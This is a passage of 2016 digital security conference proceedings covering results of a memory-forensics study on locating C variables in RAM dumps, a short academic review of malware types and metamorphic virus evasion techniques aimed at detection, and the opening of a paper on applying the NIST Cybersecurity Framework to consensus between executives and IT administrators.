explored variables scopes. Then, these dumps
are searched for these literal values. Results of
our findings are presented in Section 5.
4.4 Experiment #4
Fourth experiment is designed to investigate
the dynamically allocated string variables and
contrast them with variables that are initialized
with literal values in the source code. This
experiment explores the possibility of locating
variables values that are allocated in the heap
memory, see #4 in Figure 3.
In this experiment, variables are dynamically
allocated using malloc() and assigned a string
value from another string literal using the
strcpy() function, then some characters are
modified to distinguish the string resides in
the dynamically allocated heap space from the
original literal string. It explores the potential
of locating these string values in four different
states:
State 1: malloc(), strcpy(), and one
character is modified
State 2: malloc(), strcpy(), one character
is modified, then the free() function is
called
State 3: malloc(), strcpy(), one character
is modified, the free() function is called,
and then the process is terminated
normally

16

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

State 4: malloc(), strcpy(), one character


is modified, and then signal SIGINT
(Control-C) is used to terminate the
program abnormally. No free() is called
explicitly by the user program
States 3 and 4 are designed specifically to
explore the consequences of having a process
that is terminated normally and a process that
is terminated abnormally. A memory dump
is seized in each one of these states. Then,
these memory dumps are searched for these
dynamically allocated and modified string
values. Results of our findings are discussed
in Section 5.
5

RESULTS

This section thoroughly presents the results


from all four experiments.
Results from first experiment: show that
the values of global and local static variables
have two occurrences each. Whereas, the
value of local auto variable has only one
occurrence in both states (State 1 and State
2), see Table 1. This means, in an active
stack frame, having the referenced variable
used or not-used does not affect the number of
occurrences that can be found of the searched
value. It also means that the investigator can
find double occurrences of global and local
static variables initialized with literal strings
and only one occurrence can be found for local
auto variables.
Table 1. Results from the first experiment show that
global and local static variables have two occurrences
whereas the local auto variable has only one occurrence
for its value. States 1 & 2 show that having the
variable used or not-used does not affect the number of
occurrences in all investigated scopes.
Var. Scope
Global
Local (auto)
Local Static

State 1
2
1
2

State 2
2
1
2

Results from second experiment: show that


the values of global and local static variables

ISBN: 978-1-941968-37-6 2016 SDIWC

are found twice in the RAM dump (two


occurrences). However, the value of local auto
variable is never found in any of the three
investigated states. This means that having
an inactive stack frame during a live process
reduces our chances of locating the values of
local auto variables to zero. Whereas, having
an active or inactive stack frame does not
affect the values of global and local static
variables; at least in our investigation setup,
which consists of relatively small programs.
Table 2 presents our findings for each of the
three different variables scopes and each of
the three investigated states.
Table 2. Results from the second experiment show that
global and local static variables have two occurrences
whereas the local auto variable has zero occurrence
for its value. States 1, 2, & 3 show that having the
variable used or not-used does not affect the number
of occurrences in all investigated states, even when the
stack frame is never active.
Var. Scope
Global
Local (auto)
Local Static

State 1
2
0
2

State 2
2
0
2

State 3
2
0
2

Results from third experiment: show that


the value of the local auto variable is never
found in any of the three investigated execution
states (zero occurrence). This goes along with
the results from second experiment. However,
the number of occurrences of values of global
and local static variables is decreased from
two occurrences to only one occurrence for
each variable in each state. This means, if the
process is inactive (dead), the investigator has
a one chance to locate literal values of global
and local static variables (one occurrence).
Table 3 presents our findings for each of the
three different scopes and each of the three
investigated states.
Results from fourth experiment: show that
the investigator have a chance to locate
a dynamically allocated string value that
resides in the heap memory for a dynamically
allocated variable as long as its process

17

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Table 3. Results from the third experiment show


that global and local static variables have only one
occurrence whereas the local auto variable has zero
occurrence for its value in the RAM dump (when the
process is inactive). This is true in all of the three states,
which means having the variable used or not use does
not affect the results but having an active or inactive
process does affect the results. States 1, 2, & 3 show
that having the variable used or not-used does not affect
the number of occurrences in all investigated states, even
when the stack frame is never active.
Var. Scope
Global
Local (auto)
Local Static

State 1
1
0
1

State 2
1
0
1

State 3
1
0
1

is live and the value is not released yet


(free() function is not called) explicitly in the
program. Otherwise, we have a zero chance
of locating any of these string values; at least
in our experimentation setup. Table 4 shows
the number of occurrences for the investigated
string value within four different execution
states.
Table 4. Results from the fourth experiment show that
global, local auto, and local static variables have only
one occurrence in State 1 (where the process is active
and the (free() function is not called). Whereas, all
variables scopes have zero occurrences in all of the
other three states. This means we have a chance to locate
dynamically allocated strings only in State 1.
Var. Scope
Global
Local (auto)
Local Static

State 1
1
1
1

State 2
0
0
0

State 3
0
0
0

State 4
0
0
0

RELATED WORK

Many researchers find in the RAM memory a


vital source of information that can be used
in support for legal actions against criminals
in digital forensic cases [8, 9, 10, 11, 12, 13].
Ahmad Shosha et al. developed a prototype
to detect different malicious programs that
are regularly used by criminals.
The
proposed approach depends on the deduction
of evidences that are extracted based on traces
related to the suspect program [14]. Chan
Ellick et al. introduced ForenScope [15]
a RAM forensic tool that permits users to

ISBN: 978-1-941968-37-6 2016 SDIWC

investigate a machine using regular bash-shell.


It allows users to disable anti-forensic tools
and search for potential evidences. In order
to maintain the RAM memory intact, it is
designed to work in the unused memory space
on the target machine. Petroni et al. introduced
FATKit [16]. It is a digital forensic tool
dedicated to extract, analyze, and visualize
the digital forensic data. It utilizes program
source code and its data structure during
the analysis of memory dumps. Arasteh et
al. extracts evidences from RAM memory
based on the logic of the process that is
extracted from its stack memory segment [17].
Funminiyi Olajide et al. uses RAM dumps to
extract users input information from Windows
applications [18]. Narasimha Shashidhar et al.
targeted the prefetch folder and its potential
value to the investigator. This prefetch folder is
used to speed up the startup time of a program
on a Windows Machine [19].
7

FUTURE WORK

For future work, we are planning to investigate


other environments: Windows, Mac, and
small devices such as phones and tablets.
Some languages have its own memory
management system and its own virtual
machine while the other just like C depends
directly on the operating system in their
memory management. We plan to investigate
the differences in the behavior of various
programing languages such as C++, Java, C#,
and Python. Furthermore, we are looking
forward to investigate similar scenarios for
other data types and data structures. Finally, it
would be important to investigate various types
and their impacts on long running programs
such as servers.
8

CONCLUSION

This paper utilizes information from the


source code of the a program and employs
programs execution data during various
execution states to help investigator establish
the evidence against a perpetrator.
This
will allow law enforcements to take legal

18

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

actions against criminals in the court of


law. Our experimentation is based on the
C programming language. Based on these
experiments, we found that utilizing source
code information can be valuable to the
investigator. It helps establish the evidence that
the perpetrator is actually used the software to
perform the crime or to cover the wrongdoing.
Various string literals and non-literals related
to the program execution are successfully
located during various scenarios and execution
states.
REFERENCES
[1] M. H. Ligh, A. Case, J. Levy, and A. Walters, The
art of memory forensics: detecting malware and
threats in windows, linux, and mac memory. John
Wiley & Sons, 2014.
[2] M. Banahan, D. Brady, and M. Doran, The C book.
No. ANSI-X-3-J-11-DRAFT, Addison-Wesley
New York, 1988.
[3] D. P. Bovet and M. Cesati, Understanding the
Linux kernel. OReilly Media, Inc., 2005.
[4] A. Josey, D. Cragun, N. Stoughton, M. Brown,
C. Hughes, et al., The open group base
specifications issue 6 ieee std 1003.1, The IEEE
and The Open Group, vol. 20, no. 6, 2004.
[5] E. Youngdale, Kernel korner: The elf object file
format by dissection, Linux Journal, vol. 1995,
no. 13es, p. 15, 1995.
[6] H. Lu, Elf: From the programmers perspective,
in NYNEX Science & Technology Inc, Citeseer,
1995.
[7] W. R. Stevens and S. A. Rago, Advanced
programming in the UNIX environment.
Addison-Wesley, 2013.
[8] M. I. Al-Saleh and Z. A. Al-Sharif, Utilizing
data lifetime of tcp buffers in digital forensics:
Empirical study, Digital Investigation, vol. 9,
no. 2, pp. 119124, 2012.
[9] Z. A. Al-Sharif, D. N. Odeh, and M. I.
Al-Saleh, Towards carving pdf files in the
main memory, in The International Technology
Management Conference (ITMC2015), pp. 2431,
The Society of Digital Information and Wireless
Communication, 2015.

ISBN: 978-1-941968-37-6 2016 SDIWC

[10] V. S. Harichandran, D. Walnycky, I. Baggili, and


F. Breitinger, Cufa: A more formal definition
for digital forensic artifacts, Digital Investigation,
vol. 18, pp. S125S137, 2016.
[11] M. Rafique and M. Khan, Exploring static
and live digital forensics: Methods, practices
and tools, International Journal of Scientific
& Engineering Research, vol. 4, no. 10,
pp. 10481056, 2013.
[12] F. N. Dezfoli, A. Dehghantanha, R. Mahmoud,
N. F. B. M. Sani, and F. Daryabar, Digital
forensic trends and future, International Journal
of Cyber-Security and Digital Forensics (IJCSDF),
vol. 2, no. 2, pp. 4876, 2013.
[13] L. Cai, J. Sha, and W. Qian, Study on
forensic analysis of physical memory, in
Proc. 2nd International Symposium on Computer,
Communication, Control and Automation (3CA
2013), 2013.
[14] A. F. Shosha, L. Tobin, and P. Gladyshev, Digital
forensic reconstruction of a program action, in
Security and Privacy Workshops (SPW), 2013
IEEE, pp. 119122, IEEE, 2013.
[15] E. Chan, W. Wan, A. Chaugule, and R. Campbell,
A framework for volatile memory forensics,
in Proceedings of the16th ACM conference on
computer and communications security, 2009.
[16] N. L. Petroni, A. Walters, T. Fraser, and W. A.
Arbaugh, Fatkit: A framework for the extraction
and analysis of digital forensic data from volatile
system memory, Digital Investigation, vol. 3,
no. 4, pp. 197210, 2006.
[17] A. R. Arasteh and M. Debbabi, Forensic memory
analysis: From stack and code to execution
history, digital investigation, vol. 4, pp. 114125,
2007.
[18] F. Olajide, N. Savage, G. Akmayeva, and
C. Shoniregun, Identifying and finding forensic
evidence on windows application, Journal of
Internet Technology and Secured Transactions,
ISSN, pp. 20463723, 2012.
[19] N. K. Shashidhar and D. Novak, Digital forensic
analysis on prefetch files, International Journal
of Information Security Science, vol. 4, no. 2,
pp. 3949, 2015.

19

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Systems in Danger: A Short Review on Metamorphic Computer Viruses


Seyed Amirhossein Mousavi1, Babak Bashari Rad2 , Teh Ying Wah3
Asia Pacific University of Technology & Innovation, 1,3University of Malaya
1,2
Technology Park Malaysia, Bukit Jalil, 57000 Kuala Lumpur, Malaysia, 1,3University of Malaya,
Jalan Universiti, 50603 Kuala Lumpur, Malaysia
1
[email protected], [email protected], [email protected]
1,2

ABSTRACT
In current times, anti-virus scanners are usually
built on signatures which look for known
patterns in order to decide if a file is virus
infected. Hackers have incorporated the code
obfuscation methods to generate highly
metamorphic system malware in order to evade
detection of signature based scanners. The
scanners which are signature based may not be
able to detect all existence of such viruses.
Since, the metamorphic malware changes their
appearance from one generation to another.
Metamorphic malware is one of the many
techniques that hackers use to attack systems.
This paper explores the common types of
computer malwares and metamorphic computer
viruses while reviewing the different techniques
of metamorphic malwares which are able to
avoid detection.
KEYWORDS
Malware, Compute Virus, Metamorphic virus,
Polymorphic Virus, Obfuscation.

of the world population has access to internet


connection [1]. Therefore, the impressive
growth of these facts in the recent years, show
that the end point devices need to be protected
from the enormous number of malwares which
attempts to infiltrate such systems via the
network and internet connected devices.
In this paper, firstly the metamorphic malware
characteristics will be explored. In order to
achieve this goal, we initially outline different
types of malwares that have been developed to
defeat signature based antivirus scanners, then
we discuss about the common types of
computer viruses and the complexity of
metamorphic malware along with its
characteristics.
This paper discusses the sections in the
following order: In next section, we describe
the common types of malwares. Section 3
explores polymorphic and metamorphic
computer viruses, and the complexity of
metamorphic malware. Section 4 is a research
about the previous related works. Finally, the
conclusion will be given in the final section.
2 COMMON TYPES OF MALWARE

1 INTRODUCTION
As information technology is growing and
improving, the need for endpoint protection is
getting more imperative. An end point can be a
laptop, desktop, server, or a mobile device that
connects to a network (internet). According to
Internet Live States, the number of Internet
users have amplified remarkably from 1999 to
2013 to the tenfold and today more than 40 %

ISBN: 978-1-941968-37-6 2016 SDIWC

Following sections discuss the common types


of malware which can be broadly classified into
different categories.
2.1 Adware
Adware or Advertising sustained software is a
type of computer malware that can
spontaneously deliver advertisements. An

20

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

adware will display or download advertisement


to a computer after a malicious software is
installed or application is used [2].
This software is programmed to determine
which internet site is most visited by the user
and then displays advertisements relevant to the
users interests. The most common adware
programs are online free games, peer to peer
software such as torrents, etc.

with the virus though mediums such as


downloading and executing a file from internet
or just by opening an email attachment [4].
Trojan Horses are accruing to different
classifications depending on how the systems
are breached and the amount of the damages
caused by it. Some major types of Trojan
Horses are inclusive of remote access Trojans,
proxy Trojans, FTP Trojans, Destructive
Trojans etc. [5].

2.2 Spyware
These type of malwares are either spying on or
monitoring users and gather information about
the web sites frequently visited by the users,
which may include credit cards or online
banking details, email addresses etc. This
software helps the hackers to collect
information about victims system without the
consent of the victim. A good example of this
malware is a keylogger software which is used
to monitor activities of a victim system [3].
2.3 Worms
It is a program which copies itself repeatedly
and eliminates all the data and files on the
victim computer. This program is designed to
steal data, delete files or create botnets.
According to Cisco, computer worms are
similar to viruses and can cause the same type
of damage [4]. The major difference is that
worms have the ability to work as a standalone
software and spread independently while
viruses need human help to propagate [2]. One
technique of distributing worm is via sending
large number of emails with infected
attachments to a users contact list.
2.4 Trojan Horse
Trojan Horse is a malicious program that acts to
be a harmless software. However, according to
Cisco, Trojan viruses are not able to re-create
themselves by infecting other files nor do they
self-replicate. In order to spread itself, this type
of malware requires the end user to interact

ISBN: 978-1-941968-37-6 2016 SDIWC

2.5 Botnet
Botnet, also known as zombie army, is a type of
malware that an attacker can use to control the
infected computer or any remote devices. The
word Botnet is a comprised version of the
words: bot and net. In this context, Bot is
derived from the word robot which usually
refers to a computer or device which is infected
by malicious software. On the other hand, Net
is generated from the word network which is
a group of interconnected computers connected
together. Attackers developing a malicious
application might not be able to log onto
individual computers which they might have
infected, therefore attackers utilize botnets in
order to control a massive quantity of infected
computers automatically [6].
2.6 Ransomware
This is a type of malicious software that blocks
or limits the user from accessing the computer
or the files contained by the computer. These
destructors work by locking either the systems
screen or the users files and the scammer
demanding a ransom in exchange for them to be
unlocked. It is also considered a scareware as it
forces user to pay a fee by scaring or
intimidating them [7].
2.7 Rootkit
A rootkit is another type of computer malware
that is intended to distantly access a system

21

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

without detection by any user or security


program [2].
The prevention of rootkit attack can be very
difficult and the hardest of all Malwares to
detect because of their stealthy operation and
attempt to continually hide their presence.
Therefore, the detection process relies on other
methods such as manual detection like
monitoring computer behavior for irregular
activity, signature scanning and etc. [8].
2.8 Virus
A virus is another variant of malicious software
which is a smaller sized program with harmful
intent which copies itself and spreads to other
systems. This malicious software most often
spreads by sharing software or files between
different computers [4].
The two common types of viruses are known as
polymorphic and metamorphic viruses which
will be discussed in the next chapter.
3 POLYMORPHIC AND METOMORPHIC
COMPUTER VIRUSES
As discussed in the previous section a virus is
another type of malicious software that is a
small in size with harmful intent that will easily
copy itself and spread to other systems. This
section relates to the field of computer viruses,
and discusses about two (2) common typespolymorphic and metamorphic viruses.
3.1 Polymorphic
It is one of the most complicated types of
system malwares that can affect data types and
functions. It is a self-encrypted virus which is
categorized by the following behavior:
encryption, self-multiplication and ability to
change one or more components of itself to
remain elusive. It is designed to avoid detection
by a scanner and is capable of creating
modified copies of itself [9].
Therefore, a polymorphic virus has the
tendency to change itself more than one way

ISBN: 978-1-941968-37-6 2016 SDIWC

before propagation onto the same computer or


interconnected network computers. Since this
malicious software is changing its components
properly and they are encrypted, it is very
difficult for anti-virus applications to detect
them and can be said to be one of the most
intelligent viruses as they are hard to identify.
Polymorphic viruses are able to create an
infinite number of new decryptors which
require to use different types of encryption
methods in order to encrypt the constant part of
the virus body. The following figure represents
generation of a polymorphic virus.
DIFFERENT GENERATIONS
OF A POLYMORPHIC VIRUS

DECRYPTED VIRUS
BODY

G1

G2

Gn

Figure 1. Generation of a polymorphic computer virus


[15]

3.2 Metamorphic
According to Kaspersky, A metamorphic
malware is the one that can transform based on
the ability to edit, translate and rewrite its own
codes. Metamorphic malware is considered the
most infectious malicious software and can
cause serious damage to a system if it is not
detected quickly [10].
It is very difficult for antivirus programs to
detect metamorphic malware as it has the
ability to change the internal structure of the
code; reprogram and rewrite after each
infection to a computer system [14]. To prevent
computers in networks of infectious
metamorphic malware, user administrator

22

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

should use a multi-layered approach to blended


management including: a well-defined set of
security policies, restrictions for remote access
control and usage of an antivirus that is
frequently updated.
Metamorphism can change the appearance of
the virus while maintaining its functionality.
Metamorphic virus does not require decryption
or encryption techniques. They present new
bodies of viruses on each infection.
Metamorphic engine can either be embedded in
the virus itself or can be either left isolated [14].
Figure 2 illustrates the generations of a
metamorphic virus whose shape changes but
the functionality stays the same.

its body via the implementation of different


types of registers, regardless the opcodes are
still similar across generations. A good example
of this technique is W95/RegSwap virus.
Although the new transformed version of the
virus is not the same with the previous one, the
variability still is not in high level and the virus
can be easily detected by using simple
techniques such as Half-Byte wildcard in
signature string scanning [11]. This technique is
also called registers exchange or registers
renaming.

G0
Gn
G1

G2

G3
Figure 3. Two different generations of RegSwaps [11]
Figure 2. Generation of a metamorphic computer virus
[15]

3.3 Obfuscation Techniques


Virus writer generally uses different techniques
to develop a highly morphed metamorphic
virus. The following sections show the common
techniques of programming a metamorphic
virus.
3.3.1 Register Swap Technique
This is the simplest technique of metamorphic
malware. In this technique a malware changes

ISBN: 978-1-941968-37-6 2016 SDIWC

3.3.2 Subroutine Permutation Technique


In this technique, by reordering the virus
subroutines, the appearance of a virus would be
changed too. For example, when a virus has n
unique number of subroutines, it can generate n
factorial various generations without repetition.
A good example of this virus that incorporates
in this technique is W32/Ghost. This malicious
application contains 10 subroutines from which
it is able to generate 10 factorial or 3,628,800
discrete replicated items. Nonetheless, the virus
may still be detected with the usage of search

23

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

strings [12] as the content of every subroutine


stays the same.

EP

EP

Figure 4. Subroutine permutation Technique [12]

3.3.3 Garbage Instruction Insertion


Technique
Some Metamorphic viruses utilize the removal
and insertion of garbage instruction codes to
produce morphed copies. This technique is also
familiarized as do nothing code which does
not alter the function of an application when
executed, but rather will cause the size of the
code to be increased [13].
Viruses containing garbage instructions are
difficult to detect via the usage of signature,
because this technique breaks the signature of
the virus. This instruction may be added within
a threshold value. The intrusion detection
systems are definitely able to identify the
anomaly in the code if the quantity of garbage
instructions are greater in number. The
following table is shown as an example of
garbage instruction codes.

Figure 5. Example of Garbage Codes [13]

ISBN: 978-1-941968-37-6 2016 SDIWC

4 RELATED WORKS
A research about metamorphic malware
dynamic analysis by Nair, V.P. [16] discuss a
technique for identifying unnoticed malware
samples via STraceNTx which basically
executes files in an emulated framework was
proposed. However the results of the test
concluded that NGVCK produced variants
showed lower level of inter and intra
constructor proximity. Another research in
opcode graph similarity and metamorphic
detection by Runwal,N. [17] in 2012 discusses
about the development of another graph based
malware detection tool. The deconstructed
malware files were used in order to generate an
opcode graph. The conclusion drawn was that
the HMM based scanner was not competent
against the graph based technique.
The journal in structural entropy and
metamorphic malware by Baysa, D [18]
discusses how a statistical malware detector
was developed which was based on structural
entropy and wavelet transform. For the G2
Viruses and MWORM a detection percentage
of 100 was achieved. Nonetheless, a false
positive rate was achieved for NGVCK virus of
larger capacity. The research by Vinod, P. in
2012 talks about implementing Bioinformatics
Multiple Sequence Alignment (MSA) technique
in order to detect metamorphic malware. [19]
This detector however was able to achieve a
better detection at the rate of 73.2% and was
awarded the third most accurate in comparison
to other malware commercial scanners.
The research paper by Raphel, J and Vinod, P
in 2015, proposed a system which is nonsignature based and is able to create a meta
feature area in order to detect metamorphic
malware [20]. In this paper it was discussed
how metamorphic malware was detected by
collecting metamorphic malware samples
where three combinations of function are taken
out from the files which are branch opcodes,
unigrams and bigrams. Toderici, A.H and
Stamp, M in 2015, constructed a hybrid
malware detector via combining HMM and

24

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Chi-Square methods. The aforementioned


hybrid tool demonstrated improved accuracy
when differentiated with other malware
detectors autonomously exhibited with HMM
and CSD [21].
Sridhara, S. M and Stamp, M in 2013 proposed
the development of a metamorphic worm. The
results from the experiments demonstrated that
MWORM expanded with nonthreatening
subroutine in order to evade detection via
signatures [22]. To find dead code in malware
specimen, code emulation is used in another
research by Priyadarshi in 2011 [23]. This
emulator was applied on the metamorphic
worms consequently maintaining the HMM
approach. Linear Discriminant Analysis (LDA)
was used for metamorphic malware detection in
another research by Kuriakose, J and Vinod, P
in 2014. When using LDA ranked features for
classification, a 99.7% of detection level is
acquired [24].

ransomware, rootkit and viruses which can also


be classified in further categories. Also, we
surveyed different techniques of metamorphic
malware as register swap, subroutine and
garbage instruction which have been created
mainly to help metamorphic malware to evade
antivirus scanners. The future trend is to
research about artificial intelligent techniques
to provide a more efficient technique to
increase the accuracy of detection of
metamorphic malwares.
REFERENCES
[1]

Internet Live State. 2016. Internet User in the World


[Online].Available: http:// internetlivestats.com/internet-users/.
[Accessed 31th July 2016].

[2]

Nate Lord. 2012. Common Malware Types: Cybersecurity


[Online].Available:https://www.veracode.com/blog/2012/10/com
mon-malware-types-cybersecurity-101 [Accessed 1th August
2016].

[3]

Vinod P, and V.Laxmi,M.S.Gaur. 2009. Survey on Malware


Detection Methods, in Proceedings of the 3rd Hackers Workshop
on computer and internet security (IITKHACK09).

[4]

Cisco. What Is the Difference: Viruses, Worms, Trojans, and


Bots?[Online].Available:hhttp://www.cisco.com/c/en/us/about/sec
urity-center/virus-differences.html#2 [Accessed 25th July 2016].

[5]

Webopedia. Trojan horse [Online].Available:


http://www.webopedia.com/TERM/T/Trojan_horse.html
[Accessed 26th Juky 2016].

[6]

Stephen Cobb. 2014. Botnet malware: What it is and how to fight


it[Online].Available:
http://www.welivesecurity.com/2014/10/22/botnet-malware-fight/
[Accessed 30th July 2016].
scamwatch. 2016. Malware & ransomware [Online].Available:
https://www.scamwatch.gov.au/types-of-scams/threatsextortion/malware-ransomware [Accessed 5th August 2016].

5 CONCLUSION
The evolution of malware has become a great
challenge of this decade. Malwares are getting
more intelligent and spreading faster among the
worldwide computer networks. It will be an
interesting time for antivirus researchers to
explore some new methods for detection of
these destructors. Metamorphic malware family
is the most challenging threat today as they are
quite advanced and furthermore reduced the
significance of signature-based detection.
For an attacker, writing a metamorphic
malware is considered to be more difficult than
writing polymorphic, which needs to be
programmed to use multiple transformation
techniques such as register renaming, code
shrinking, code permutation and garbage code
insertion. Consequently, for detection of this
malware, different techniques such as generic
decryption techniques, negative heuristic
analysis and etc. are required to be applied.
In this research, we briefly surveyed the
common malware types such as adware,
spyware, worms, Trojan horse, botnet,

ISBN: 978-1-941968-37-6 2016 SDIWC

[7]

[8]

Malwaretruth. 2016. List of Common Malware Types


[Online].Availablehttp://www.malwaretruth.com/the-list-ofmalware-types/ [Accessed 4th August 2016].

[9]

Arun Kumar. 2016. What is a Polymorphic Virus and how do you


deal with it [Online]. Available
http://www.thewindowsclub.com/polymorphic-virus [Accessed
5th August 2016].

[10] Kaspersky. 2016. What is Metamorphic Virus? [Online].


Available https://usa.kaspersky.com/internet-securitycenter/definitions/metamorphic-virus#.V6nfErh94_5 [Accessed
7th August 2016].

25

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

[11] Gayathri Shanmugam. 2012. Simple Substitution Distance and


Metamorphic Detection
[Online]. Available
http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.344.865
&rep=rep1&type=pdf [Accessed 2th August 2016].

Computing Conference (IACC), IEEE International, pp. 112-117,


2014

[12] J. Borello and L. Me, Code Obfuscation Techniques for


Metamorphic Viruses, Feb 2008, Journal in Computer Virology
[13] E. Daoud and I. Jebril, Computer Virus Strategies and Detection
Methods, Int. J. Open Problems Compt. Math., Vol. 1, No. 2,
September 2008
[14] Babak Bashari Rad, Maslin Masrom, and Suhaimi Ibrahim,
Camouflage in Malware: from Encryption to Metamorphism,
IJCSNS International Journal of Computer Science and Network
Security, VOL.12 No.8, August 2012.
[15] Peter Ferrie. 2003. Hunting For Metamorphic
[Online]. Available
https://www.symantec.com/avcenter/reference/hunting.for.metam
orphic.pdf [Accessed 7th August 2016].
[16] Nair, V. P., Jain, H., Golecha, Y. K., Gaur, M. S., & Laxmi, V,
MEDUSA: MEtamorphic malware dynamic analysis using
signature from API, Proceedings of the 3rd International
Conference on Security of Information and Networks, pp. 263269, 2010.
[17] Runwal, N., Low, R. M., & Stamp, M, Opcode graph similarity
and metamorphic detection, Journal in Computer Virology, 8(12), 37-52, 2012.
[18] Baysa, D., Low, R. M., & Stamp, M., Structural entropy and
metamorphic malware, Journal of Computer Virology and
Hacking Techniques, 9(4), 179-192, 2013.
[19] Vinod, P., Laxmi, V., Gaur, M., & Chauhan, G, MOMENTUM:
Metamorphic malware exploration techniques using MSA
signatures, Innovations in Information Technology (IIT),
International Conference on, pp. 232-237, 2012.
[20] Raphel, J., & Vinod, P., Pruned feature space for metamorphic
malware detection using markov blanket, Contemporary
Computing (IC3), 2015 Eighth International Conference on, pp.
377-382., 2015.
[21] Toderici, A. H., & Stamp, M., Chi-squared distance and
metamorphic virus detection, Journal of Computer Virology and
Hacking Techniques, 9(1), 1-14, 2014.
[22] Sridhara, S. M., & Stamp, M, Metamorphic worm that carries its
own morphing engine, Journal of Computer Virology and
Hacking Techniques, 9(2), 49-58, 2013.
[23] Priyadarshi, S. 2013. Metamorphic detection via emulation
[Online]. Available
http://www.cs.sjsu.edu/faculty/stamp/students/priyadarshi_sushan
t.pdf [Accessed 22th August 2016].
[24] Kuriakose, J., & Vinod, P., Ranked linear discriminant analysis
features for metamorphic malware detection, Advance

ISBN: 978-1-941968-37-6 2016 SDIWC

26

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Application and Evaluation of Method for Establishing Consensus on Measures


Based on Cybersecurity Framework
Shota Fukushima and Ryoichi Sasaki
Tokyo Denki University
Tokyo Denki University Senjuasahicho 5, Adachi-ku, Tokyo-to, 120-8551 JAPAN
[email protected] and [email protected]

ABSTRACT
Due to the development of our information society
in recent years, the number of companies depending
on IT systems has increased. However, it has been
noticed that executives have not implemented
sufficient information security measures. This is due
to the poor consensus regarding information
security between executives and IT administrators
in an enterprise. Numerous approaches to solve this
problem have been carried out. The Cybersecurity
Framework developed by NIST is one approach.
However, the Cybersecurity Framework does not
have a function to select and enumerate specific
measures on the basis of mutual understanding
between executives and administrators. By applying
the Cybersecurity Framework and use cases of the
framework provided by the Intel Corporation, we
propose a method that can enumerate measures and
obtain the optimal combination of measures that
leads to mutual agreement between executives and
administrators. Moreover, the authors implemented
a system called Risk Communicator for Tier
(RC4T) to support the framework. By applying this
framework and RC4T to a small example, we were
able to enumerate specific measures for obtaining
mutual consensus between executives and
administrators.

KEYWORDS
Cybersecurity Framework
Information security management
Information security governance
Risk management
Consensus building

1 INTRODUCTION

ISBN: 978-1-941968-37-6 2016 SDIWC

In recent years, incidents related to information


security have been increasing. However, the
awareness of companies involved in
information security is insufficient [1]. One
cause is the poor understanding of information
security between executives (e.g. CIO, CEO)
and IT administrators (e.g. security manager)
[1]. If the understanding is poor, executives will
not be reasonably aware of the organizations
information security and will be less likely to
fund information security measures. For this
reason, the level of company-wide information
security could be reduced because adequate
information security measures for the entire
organization might not be implemented.
Because some executives have minimal
technical knowledge, methods to treat
information security as a risk have been
proposed [2]. One of these methods is the
Cybersecurity Framework (CSF) proposed by
the National Institute of Standards and
Technology (NIST) [3]. CSF is a framework for
information security management. In this
framework, the current state and the target state
of information security management are
compared in order to express, understand and
manage the risks associated with information
security. In general, it is assumed that
executives are able to understand the current
state of information security of an organization
by comparing the current state and the target
state. Therefore, CSF is expected to facilitate a
mutual understanding between executives and
administrators. In addition, the usefulness of the
CSF is expected from the experimental result of
applying the CSF to actual issues, as was done

27

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

by the Intel Corporation [4]. However, it is


necessary to enumerate and select measures to
fulfill the overall targets of an organization.
Because the CSF compares the current state and
the target state, it is impossible to enumerate
and select specific measures to reach the target.
By considering use cases of the Intel
Corporation as well as other cases related to the
CSF, we found some guidelines for
implementing the CSF. However, the
guidelines do not include a method for
enumerating and selecting measures. Therefore,
we propose a method to obtain the optimal
combination of measures that leads to a mutual
understanding
between
executives
and
administrators. Moreover, to support the
method, we developed a system named Risk
Communicator for Tier (RC4T). In this paper,
we propose processes to take the consensus of
proposed measures between executives and
administrators. In addition, we verify whether
we can reach a consensus by using RC4T in the
authors laboratory.

Functions, which are the most basic content for


the information security measures, include
Identify, Protect, Detect, Respond and Recover.
Categories are obtained by subdividing the
Functions (Fig. 2).
Subcategories are obtained by subdividing the
Categories and summarizing the information
necessary to denote the Categories to which the
Subcategories belong.
Information References are assigned to each
Subcategory. Information References help
classify the Subcategories.

2 OVERVIEW of CSF
The CSF is a framework that summarizes the
risk management principles for the purpose of
improving the cybersecurity of critical
infrastructures. In addition, the CSF can
possibly fill the gap between the current state
and the target state, and the gap of the level of
understanding
between
executives
and
administrators in a risk-based approach. The
CSF, which can be customized to fit the needs
of each organization, is composed of the
following three elements:
(1) Framework Core
(2) Framework Implementation Tiers
(3) Framework Profile

Figure 1. Structure of the Core (created according to


reference [4]).

2.1 Framework Core


The framework core (hereinafter referred to as
Core) consists of Functions, Categories,
Subcategories and Information References (Fig.
1).

ISBN: 978-1-941968-37-6 2016 SDIWC

28

Proceedings of the Third International Conference on Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016

Functions

Identify

Protect

Detect

Respond

Recover

Categories
Asset Management
Business Environment
Governance
Risk Assessment
Risk Management Strategy
Access Control
Awareness / Training
Data Security
Protective Process / Procedures
Maintenance
Protective Technologies
Anomalies / Events
Security Continuous Monitoring
Detection Process
Response Planning
Communication
Analysis
Mitigations
Improvements
Recovery Planning
